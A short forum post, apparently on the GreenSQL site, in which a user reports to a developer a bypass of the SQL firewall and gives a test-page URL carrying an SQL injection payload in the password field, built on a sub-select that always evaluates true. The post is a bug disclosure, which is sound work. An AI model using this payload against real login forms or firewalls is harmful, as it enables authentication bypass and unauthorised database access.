Bypass of SQL by sub select

No replies
RotemB
RotemB's picture
Joined: 02/10/2008
User offline. Last seen 1 year 44 weeks ago.

Hi Yuli,
I found a nice bug in the firewall

This is the url for the exploit.
http://www.greensql.net/sql-injection-test?
sql_user=aaaa&sql_pass=aa')%20or%20((select%20'1')='1

Rotem Bar

Back to top